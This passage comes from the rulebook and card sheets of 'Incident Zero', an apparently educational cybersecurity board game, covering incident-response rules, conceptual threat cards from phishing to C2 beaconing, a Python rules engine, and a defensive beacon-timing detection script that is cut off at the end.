Variation 3: Extended Investigation (Advanced)

Deeper Forensics:
  - Add an "Advanced Investigate" action (costs 15 Budget, rolls 11+)
  - A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2)
  - Allows for a riskier but more rewarding investigation strategy

Best For: Players who want forensic investigation to feel more rewarding


Variation 4: Competitive Tournament

Multiple Teams, Same Challenge:
  1. All teams receive the same 4-card attack chain
  2. All teams start with the same 100 Budget and the same 5 Defense Cards drawn
  3. Teams play simultaneously (or in sequence) against the same scenario
  4. Scoring: Cards revealed + Budget remaining = final score
  5. Tiebreaker: Fewest turns taken

Best For: Classroom competition, conference play, benchmarking


Next Steps After This Module

If You Won (Completed All Cards)

Option 1: Continue to Hardening Module
  - Excellent choice if building defenses against discovered threats
  - Use the attack chain you just discovered as the hardening context
  - Natural progression: detect the attack → now prevent it

Option 2: Continue to Audit & Compliance Module
  - Great for understanding how to detect this attack chain
  - Validates that your detection methods work
  - Audits your existing security controls

If You Lost (Time/Budget Expired)

Option 1: Continue to Disaster Recovery Module
  - Appropriate: assume the attack succeeded
  - Manage the breach that just happened
  - Focus on response, stakeholder communication, recovery

Option 2: Replay with Different Strategy
  - Try again with a different investigation/defense approach
  - Use what you learned to optimize the next attempt

Option 3: Study Real Breach Case Studies
  - Compare your experience to real breaches (Equifax, Target, SolarWinds)
  - Understand why real dwell times are 200+ days
  - Learn what signals real defenders look for

Standalone Play

Play Again with:
  - Different attack chain from the card deck
  - Different difficulty (if you won easily or struggled)
  - Competitive mode against other teams
  - Extended variations with different mechanics


Quick Reference: Actions & Costs

| Action | Cost | Roll Required | Success Condition | Failure Condition |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: card revealed (v2.2) | No intel gained |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 Budget (v2.2) | None | Threat removed, penalty stops | n/a |

Quick Reference: Modifiers

| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence" |
| +1 | Real security tools/techniques | "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link |
| +0 | Vague/no justification | "Find suspicious activity" |

Quick Reference: Trackers

| Tracker | Starts At | Changes |
|---|---|---|
| Budget | 100 | -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when a card is revealed, -1 when auto-mitigated or Emergency Response is used |

v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Investigation reveals (accumulating successes). The first successful Investigation of a chain link yields a clue; a second successful Investigation of that same link reveals the card. Deploy Defense full-match still reveals immediately. Previously only defense deployment could reveal cards, contradicting the overview text. Validate: does investigation-led play feel viable but slower than defense-led play?
  2. Deployed Defense Persistence. A deployed defense grants +2 to Investigate/Deploy rolls against any chain link matching its vector. Partial/no-match deployments now have lasting value.
  3. Active Breach Cost. −5 Budget at the start of each turn while at least one chain card is unrevealed. Fixes the inversion where hidden threats were free; teaches that dwell time costs money.
  4. Economy rebalance: Budget Grant reward reduced +15 → +10; Emergency Response repriced 25 → 15 Budget.
  5. Budget edge rules: Budget floors at 0; actions require full cost; victory is checked immediately on the final reveal (before start-of-turn penalties); defeat at 0 only if no legal action exists.
  6. Turn limits use the Variable Game Length formula (chain × 2) + 1 → 7/9/11 turns, replacing the fixed 12/10/10 table (see Core Rules §3a).
  7. Sequential discovery clarified: only the earliest unrevealed chain card can be revealed.
  8. Content fixes: sample-defense lists now cite real card IDs from the canonical 24-card deck (D-01–D-24); D-11 DLP correctly listed as ADVANCED/15.

Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.


Need Help?


Incident Response Module - Rules & Mechanics
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

docs/standalone-games/incident-response.md

Incident Response Module: Standalone Play Guide

Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Incident response training, attack detection practice, SOC operations


Module Overview

The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.

This is the foundation module—many other modules build upon successful or unsuccessful incident response.


Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

| Difficulty | Chain Length | Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |

2. Threat Orchestrator Preparation

Create the Attack Chain:
1. Select 3-5 threat cards in logical sequence
2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL
3. Write down clues for each hidden card (don't reveal yet)
4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md

Recommended first-time scenario:
- T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
- T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
- T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
- Total: 3 cards, ~30 minutes, teaches full attack chain concept

3. Blue Team Setup

4. Read the Opening Scenario

The Threat Orchestrator reads an opening scenario based only on the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."


Gameplay Loop (25-35 minutes)

Round Structure

Each turn follows this structure:

1. START OF TURN
   - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget
   - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free)
   - Read turn number aloud ("Turn 3...")

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Team discusses strategy
   - Decides on ONE action (see below)
   - Announces action and parameters

3. ACTION RESOLUTION
   - Roll 1d20 for success/failure
   - Apply modifiers (see below)
   - Determine outcome

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 Defense Card
   - Check if game won/lost

Three Available Actions

Action 1: Investigate 🔎

Cost: 5 Budget
Roll Required: 11+ (on d20)

How it works:
1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs")
2. Provide technical justification for the investigation approach
3. Roll 1d20

Roll Modifiers:
- +2 bonus: Strong technical justification (references specific logs, tools, or methodologies)
- +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK)
- +0: Vague investigation with no real justification

Examples of good justification:
- "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds"
- "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"

Outcomes (v2.2 — investigation successes accumulate):
- Success (roll + modifiers ≥ 11):
  - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below)
  - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward
- Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.

Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on card tier)
Roll Required: 11+ (on d20)

How it works:
1. Choose a Defense Card from your hand
2. Target a specific Asset or threat vector
3. Explain why this defense is appropriate for the situation
4. Roll 1d20

Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)

Outcomes:
- Success (roll + modifiers ≥ 11):
  - If the card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY!
  - If the vector matches but the step is wrong, or the step is right but the vector is wrong → Defense deployed but no reveal
  - If neither matches → Defense deployed but ineffective against the current threat
- Failure: Defense not deployed

Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.


Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25)
Roll Required: None—this always succeeds

How it works:
1. Choose a previously revealed Threat Card still in play
2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.)
3. Card is immediately removed from play
4. Uncontained Threats penalty decreases by 1

Strategic Use:
- Use this if you're running out of budget and accumulating penalties
- Use this if a threat is too dangerous to leave active
- Use this to prepare for later modules (e.g., if continuing to Hardening, fewer contained threats = more budget available)


Uncontained Threats Penalty & Active Breach Cost

How it works:
1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker)
2. At the START of each turn, deduct 5 Budget per uncontained threat
3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too)
4. When Emergency Response is used, remove that threat and decrement the tracker
5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)

Example (one action per turn; 3-card chain; Budget 100):

Turn 1: START → -5 Active Breach Cost (95)
        Deploy Defense succeeds, full match → PHISHING REVEALED
        (-10 for the BASIC defense, 85) → Uncontained Threats = 1
        Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
        Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
        ...investigation continues toward the next chain card
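
The three-turn example above, and the rough balance check in the v2.2 Playtest Edition Changes, can be replayed mechanically so playtesters can check the trackers without a table. The Python rules engine below is an added example, not part of the Incident Zero files: the tier names BASIC/STANDARD/ADVANCED for the 10/15/25 costs are an assumption, dice results are passed in as arguments rather than rolled, and the Intelligence Bonus card draw is not modelled. `worked_example()` replays the turns above and returns the Budget after each step.

```python
from dataclasses import dataclass

INVESTIGATE_COST, EMERGENCY_COST = 5, 15
DEFENSE_COSTS = {"BASIC": 10, "STANDARD": 15, "ADVANCED": 25}  # tier names are assumed
ROLL_TARGET, FAST_TRACK_TARGET = 11, 5  # d20 + modifiers must reach these
BUDGET_GRANT, PENALTY = 10, 5           # v2.2 grant; per-threat and Active Breach penalty


@dataclass
class Game:
    chain_length: int
    budget: int = 100
    turn: int = 1
    revealed: int = 0          # chain cards revealed so far (always the earliest first)
    uncontained: int = 0       # Uncontained Threats tracker
    link_successes: int = 0    # Investigate successes against the current link
    fast_track: bool = False   # Fast-Track reward pending for the next Investigate

    @property
    def turn_limit(self) -> int:
        return self.chain_length * 2 + 1  # Variable Game Length: 7/9/11 turns

    def start_turn(self) -> int:
        # Penalties apply only while a card is hidden (victory is checked before them);
        # the +1 is the Active Breach Cost. Budget floors at 0.
        if self.revealed < self.chain_length:
            self.budget = max(0, self.budget - PENALTY * (self.uncontained + 1))
        return self.budget

    def _spend(self, cost: int) -> None:
        if self.budget < cost:  # an action requires its full cost
            raise ValueError(f"cannot afford {cost} with Budget {self.budget}")
        self.budget -= cost

    def _reveal(self, reward: str) -> None:
        # Previous uncontained threat is auto-mitigated when the next card is revealed;
        # the team then picks a Discovery Reward: "grant" or "fast_track" (draws not modelled)
        self.uncontained = max(0, self.uncontained - 1) + 1
        self.revealed += 1
        self.link_successes = 0
        if reward == "grant":
            self.budget += BUDGET_GRANT
        elif reward == "fast_track":
            self.fast_track = True

    def investigate(self, roll: int, modifiers: int = 0, reward: str = "grant") -> str:
        # modifiers: +2 justification, +1 real tool, +2 Deployed Defense Persistence
        self._spend(INVESTIGATE_COST)
        target = FAST_TRACK_TARGET if self.fast_track else ROLL_TARGET
        self.fast_track = False
        if roll + modifiers < target:
            return "no_intel"   # failures never count toward the two successes
        self.link_successes += 1
        if self.link_successes < 2:
            return "clue"
        self._reveal(reward)
        return "revealed"

    def deploy_defense(self, tier: str, roll: int, modifiers: int = 0,
                       full_match: bool = False, reward: str = "grant") -> str:
        self._spend(DEFENSE_COSTS[tier])
        if roll + modifiers < ROLL_TARGET:
            return "not_deployed"
        if full_match:          # vector AND chain step both match
            self._reveal(reward)
            return "revealed"
        return "deployed"       # stays on the board for the persistence bonus

    def emergency_response(self) -> None:
        if not self.uncontained:
            raise ValueError("no revealed threat to contain")
        self._spend(EMERGENCY_COST)
        self.uncontained -= 1

    def end_turn(self) -> None:
        self.turn += 1

    def status(self) -> str:
        # Defeat at low Budget only when no legal action exists (Investigate is the cheapest)
        if self.revealed == self.chain_length:
            return "won"
        if self.turn > self.turn_limit:
            return "lost_time"
        return "lost_budget" if self.budget < INVESTIGATE_COST else "playing"


def worked_example() -> list:
    # Replays the three-turn example from the rules; returns Budget after each step
    g = Game(chain_length=3)
    trace = [g.start_turn()]                                             # 95: Active Breach only
    g.deploy_defense("BASIC", roll=14, full_match=True, reward="grant")  # -10, reveal, +10 grant
    trace.append(g.budget)                                               # 95
    g.end_turn()
    trace.append(g.start_turn())                                         # 85: uncontained + Active Breach
    g.emergency_response()
    trace.append(g.budget)                                               # 70
    g.end_turn()
    trace.append(g.start_turn())                                         # 65: Active Breach only
    return trace
```

Because rolls are arguments, a playtester can script a whole investigation-led run (two Investigates per link, Budget Grant on each reveal) and confirm the 7-turn beginner balance claim, or compare Fast-Track against Budget Grant over many scripted games.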

Winning & Losing

Victory Condition ✓

Blue Team Wins if:
- All threat cards in the attack chain are revealed
- AND this happens within your turn limit (7/9/11 by chain length)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.

Defeat Condition ✗

Blue Team Loses if:
- Turn Tracker exceeds your turn limit with unrevealed cards remaining
- OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)

Scoring (Optional)

If you want to score:

Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50

Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)

Discovery Rewards

When your team successfully reveals a Threat Card:

Choose ONE reward:

  1. Intelligence Bonus: Draw 2 additional Defense Cards (keep both)
  2. Budget Grant: Gain +10 Budget (v2.2 — reduced from +15; represents management approval of your response)
  3. Fast-Track: On your next Investigate action, you succeed on 5+ instead of 11+ (still costs 5 Budget, still need justification modifiers)

Debrief & Reflection (5-10 minutes)

FOR WINNERS:
1. "What was your investigation strategy? What worked?"
2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?"
3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"

FOR LOSERS:
1. "What went wrong in your investigation? Where did you get stuck?"
2. "Would you have benefited from more defense deployments vs. investigations?"
3. "How would you investigate differently if you could replay?"

EVERYONE:
1. "What was the attacker's complete kill chain?"
2. "Which threat card was hardest to detect? Why?"
3. "Why isn't this easy to detect in real-world networks?"
4. "What tool or process would have helped you detect faster?"


Tips for Threat Orchestrators

Creating Effective Clues

Poor clue (too vague):
- "You find something suspicious"

Too good (gives it away):
- "The attacker used Mimikatz to dump credentials from LSASS memory"

Just right (progressive disclosure):
- "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Balancing Difficulty

The game is too easy if:
- Teams reveal all cards in turns 1-4 with budget to spare
- Clues are too specific
- Teams succeed on every roll

The game is too hard if:
- Teams get stuck after revealing 1 card
- No successful rolls for 5+ turns
- Teams hit the turn limit with only 1-2 cards revealed

Adjust by:
- Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1)
- Quality of clues (more/less specific)
- Starting budget (60 vs. 100 vs. 120)
- Turn limit (formula −1 for harder, formula +1 for easier)

Running Multiple Teams

If running this for a tournament or competitive context:
- Assign different attack chains to each team (or the same chain for scoring comparison)
- Teams cannot see each other's progress
- First team to reveal all cards wins
- Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 min)

  1. T-01: Phishing Campaign
  2. T-06: Mimikatz Credential Dumping
  3. T-10: SQL Database Exfiltration

Focus: Teaching full kill chain detection in 30 minutes

Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 min)

  1. T-02: Watering Hole Attack
  2. T-04: Lateral Movement via SMB
  3. T-07: Scheduled Task Persistence
  4. T-09: Beaconing to C2 Server

Focus: Sophisticated attack with multiple detection points

Scenario 3: "Advanced Ransomware" (Advanced, 5 cards, 45 min)

  1. T-13: Compromised Software Vendor Update (expansion)
  2. T-04: Lateral Movement via SMB
  3. T-05: Privilege Escalation via Kernel Exploit
  4. T-09: Beaconing to C2 Server
  5. T-11: Ransomware Payload Deployment

Focus: Complex supply-chain-initiated attack chain


Extensions & Variations

Solo Play

Speed Mode

Cooperative vs. Competitive


Next Steps After This Module

If you won:
- Continue to Hardening Module → Build defenses against discovered threats
- Continue to Audit & Compliance Module → Verify your detection methods

If you lost:
- Continue to Disaster Recovery Module → Manage the breach that succeeded
- Replay with a different strategy
- Try a different scenario

Standalone: Play again with a different attack chain


Quick Reference: Action Costs & Outcomes

| Action | Cost | Roll | Success | Failure |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: reveal (v2.2) | No intel (budget wasted) |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 (v2.2) | None | Remove revealed threat | n/a (always succeeds) |

| Modifier | Effect |
|---|---|
| +2 | Strong technical justification |
| +1 | Real tool/technique referenced |
| +2 | Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2) |

| Tracker | Starting | Changes |
|---|---|---|
| Budget | 100 | -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when revealed, -1 when contained or next card revealed |

For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.


Need Help?


Incident Response Module - Standalone Play Guide
Part of Incident Zero, a modular cybersecurity board game

cards/incident-response/core-deck/threat-defense-cards.md

Incident Zero: Sample Card Sheets

Quick Reference


THREAT CARDS

Attack Chain Steps

Attack Vectors (Countermeasure Keywords)


SAMPLE THREAT CARD DECK (12 Cards)

INITIAL COMPROMISE THREATS

Card T-01: Phishing Campaign

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN                   │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  SOCIAL ENGINEERING         │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team reports that    │
│ several employees have received     │
│ emails claiming to be from your     │
│ IT department requesting password   │
│ resets. One user has already        │
│ clicked the link. Email headers     │
│ show the domain is spoofed."        │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Phishing exploits human psychology  │
│ rather than technical               │
│ vulnerabilities. Attackers use      │
│ social engineering to create urgency│
│ and bypass technical controls. With │
│ email authentication (DMARC/SPF) and│
│ user training, this attack is highly│
│ preventable.                        │
└─────────────────────────────────────┘

Card T-02: Watering Hole Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK                │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  WEB EXPLOIT                │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A popular industry blog your       │
│ employees frequently visit has      │
│ been compromised. Logs show that    │
│ your users' browsers were           │
│ redirected to a malicious domain    │
│ hosting an exploit kit targeting    │
│ unpatched browsers."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Watering hole attacks target        │
│ trusted third-party sites to infect │
│ specific user groups. They bypass   │
│ email filters and exploit browser   │
│ vulnerabilities. Defense requires   │
│ rapid patching and endpoint         │
│ monitoring.                         │
└─────────────────────────────────────┘

Card T-03: Compromised Credentials

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS             │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your SIEM has detected a           │
│ successful VPN login from an        │
│ unusual geographic location at      │
│ 3 AM. The username belongs to an    │
│ employee who is currently on        │
│ vacation. The login attempt came    │
│ from an IP in a known cybercrime    │
│ hosting provider."                  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Credential stuffing uses passwords  │
│ leaked from third-party breaches.   │
│ If employees reuse passwords, their │
│ work accounts become compromised.   │
│ Multi-factor authentication (MFA)   │
│ is the primary defense.             │
└─────────────────────────────────────┘

PIVOT & ESCALATE THREATS

Card T-04: Lateral Movement via SMB

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB            │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Network segmentation alerts show   │
│ unusual SMB traffic between a       │
│ compromised workstation and your    │
│ file server. Suspicious named pipe  │
│ activity detected. The attacker     │
│ appears to be enumerating shares    │
│ and attempting to access restricted │
│ resources."                         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ SMB (Server Message Block) is a     │
│ legitimate protocol, so traffic     │
│ blends in. Flat network architecture│
│ allows attackers to move freely.    │
│ Without micro-segmentation and      │
│ strong authentication, lateral      │
│ movement is easy.                   │
└─────────────────────────────────────┘

Card T-05: Privilege Escalation via Kernel Exploit

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL     │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept  │
│ exploit for an unpatched local      │
│ privilege escalation vulnerability  │
│ in the Windows kernel. Seconds      │
│ later, the same process spawned a   │
│ child running as SYSTEM. Patch      │
│ reports show this host is three     │
│ months behind on kernel updates."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Kernel exploits abuse memory-       │
│ corruption or logic flaws (think    │
│ Dirty Pipe or win32k CVEs) to jump  │
│ from a standard user to SYSTEM or   │
│ root. Public PoC code often appears │
│ within days of disclosure, so       │
│ unpatched hosts are easy targets.   │
│ Rapid patching, EDR behavioral      │
│ detection, and least privilege      │
│ limit the damage.                   │
└─────────────────────────────────────┘

Card T-06: Mimikatz Credential Dumping

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING         │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Memory forensics analysis on the   │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool  │
│ has dumped credential hashes from   │
│ memory. Several cached domain admin │
│ credentials have been extracted.    │
│ Attacker now has credentials to     │
│ move to critical systems."          │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Mimikatz attacks Windows LSASS      │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials.      │
│ Without proper Credential Guard and │
│ memory protection, domain admin     │
│ credentials become compromised,     │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘

PERSISTENCE THREATS

Card T-07: Scheduled Task Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE          │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Log analysis shows a scheduled     │
│ task created by the compromised     │
│ account. The task is set to execute │
│ every 6 hours and runs a script     │
│ from a hidden directory. The        │
│ activity occurs outside normal      │
│ business hours. Timestamp metadata  │
│ indicates advanced timestomping."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Scheduled tasks run with privileges │
│ of the owner account and survive    │
│ reboots. They blend in with         │
│ legitimate administrative tasks.    │
│ Windows Event Logs may not be       │
│ forwarded centrally, allowing this  │
│ persistence mechanism to hide.      │
└─────────────────────────────────────┘

Card T-08: Registry Run Key Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE        │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Registry analysis detects a new    │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual      │
│ location. The binary has            │
│ obfuscated metadata and a fake      │
│ digital signature. It executes at   │
│ every system startup."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Registry Run keys execute at startup│
│ with persistence across reboots.    │
│ They're difficult to distinguish    │
│ from legitimate startup programs.   │
│ Endpoint detection solutions must   │
│ actively monitor registry writes.   │
└─────────────────────────────────────┘

C2 & EXFIL THREATS

Card T-09: Beaconing to C2 Server

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER              │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your threat intelligence feed      │
│ alerts on suspicious outbound       │
│ HTTPS connections to a domain       │
│ associated with known malware.      │
│ Netflow shows regular 3-minute      │
│ intervals of encrypted traffic.     │
│ The pattern matches documented C2   │
│ beaconing behavior."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Beaconing establishes command and   │
│ control communication with the      │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection      │
│ difficult. Threat intelligence and  │
│ behavioral analysis (unusual timing)│
│ are required for detection.         │
└─────────────────────────────────────┘
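
The T-09 card's detection note, "behavioral analysis (unusual timing)", can be made concrete with a small script. The following is an added example for readers, not part of the card deck or any Incident Zero file; the flow records, IP addresses and the jitter threshold are constructed for illustration. It groups flows by source/destination pair and flags pairs whose inter-arrival times are nearly constant, the "regular 3-minute intervals" Netflow pattern the card's clue describes.

```python
from collections import defaultdict
from statistics import pstdev

# Constructed flow records (not real telemetry): epoch_seconds src_ip dst_ip bytes.
# 10.0.0.12 -> 203.0.113.7 connects every ~3 minutes with little jitter (the T-09 pattern);
# 10.0.0.25 -> 198.51.100.40 is ordinary bursty browsing; the last pair is too sparse to judge.
SAMPLE_FLOWS = """\
1700000000 10.0.0.12 203.0.113.7 1420
1700000030 10.0.0.25 198.51.100.40 82310
1700000095 10.0.0.25 198.51.100.40 4120
1700000181 10.0.0.12 203.0.113.7 1398
1700000300 10.0.0.30 192.0.2.9 500
1700000359 10.0.0.12 203.0.113.7 1433
1700000480 10.0.0.30 192.0.2.9 500
1700000540 10.0.0.12 203.0.113.7 1410
1700000612 10.0.0.25 198.51.100.40 19022
1700000640 10.0.0.25 198.51.100.40 7710
1700000719 10.0.0.12 203.0.113.7 1402
1700000901 10.0.0.12 203.0.113.7 1415
1700000999 10.0.0.25 198.51.100.40 51200
1700001025 10.0.0.25 198.51.100.40 3300
1700001040 10.0.0.25 198.51.100.40 1200
1700001080 10.0.0.12 203.0.113.7 1427
"""


def parse_flows(text):
    """Parse whitespace-separated flow lines into (timestamp, src, dst, bytes) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, nbytes = line.split()
        flows.append((int(ts), src, dst, int(nbytes)))
    return flows


def beacon_candidates(flows, min_flows=6, max_jitter=0.15):
    """Score each (src, dst) pair by how regular its inter-arrival times are.

    jitter = stdev(gaps) / mean(gaps); near 0 means clockwork timing. Pairs with
    fewer than min_flows connections are skipped: two or three flows cannot
    establish a cadence. max_jitter is a constructed tuning value, not a standard.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, _ in flows:
        by_pair[(src, dst)].append(ts)
    results = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        mean_gap = sum(gaps) / len(gaps)
        jitter = pstdev(gaps) / mean_gap if mean_gap else float("inf")
        results[pair] = {
            "flows": len(stamps),
            "mean_interval_s": round(mean_gap, 1),
            "jitter": round(jitter, 3),
            "beacon_like": jitter <= max_jitter,
        }
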